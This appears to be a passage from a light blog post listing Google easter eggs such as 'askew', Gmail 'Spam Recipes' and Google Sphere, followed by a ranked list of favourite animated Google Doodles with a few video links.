UPDATE: I just learned that aside from “tilt”, you can also use the word “askew” to get the same result.

13. Spam Recipe

Looking for some delicious recipes? Just go to your Gmail and then go to Spam to see the best “Spam Recipes”.

Google - Spam Recipe14. Dragon Slain

Open a Spread Sheet in Google Docs then press Shift+F12. See the message that will appear.

15. Google Sphere

Google Sphere
To do this trick, just visit Google.com, type in Google Sphere then click the “I’m feeling lucky” button.
Also see: Annoying Google & Let Me Google That For You
If you know other cool Google tricks, you can share them here by leaving your comments below.

Best Google Doodle Animations


A lot of people have always been fascinated with the cool Google Doodles every time there’s a special occasion like the birthday of famous people, Olympics, and holidays. The first Google Doodle was in honor of the Burning Man Festival on 1998 and from then on, we’ve seen numerous Google logos with playful designs like the cute Sesame Street and Scooby Doo logos.



As years passed by, Google Doodles have evolved from plain images to animated doodles which makes “Googling” more fun and entertaining. Here’s a great list of some of the best animated Google Doodles and the all-time favorites!
Best Google Doodle Animations

1. Jim Henson’s 75th Birthday


2. Lucille Ball’s 100th Birthday



3. Jules Verne’s 187th Birthday

4. Les Paul’s 96th Birthday

5. 160th Anniversary of the First World’s Fair

6. 51st Anniversary of the Human Spaceflight

7. Google Instant – Particle Logo

8. Robert Bunsen’s 200th Birthday

9. Earth Day 2011

10. Charlie Chaplin’s 122nd Birthday

httpv://www.youtube.com/watch?v=3NGSU2PM9dA

11. Alexander Calder’s 113th Birthday

httpv://www.youtube.com/watch?v=ZqeGvECBEOs
12. Thomas Edison’s Birthday


13. Pacman’s 30th Anniversary Doodle

14. Nam June Paik’s Birthday

15. Independence Day 2012


Top 3 All-time Favorite Google Doodle Animations
3. Freddie Mercury’s 65th Birthday


2. John Lennon’s 70th Birthday



1. Martha Graham’s 117th Birthday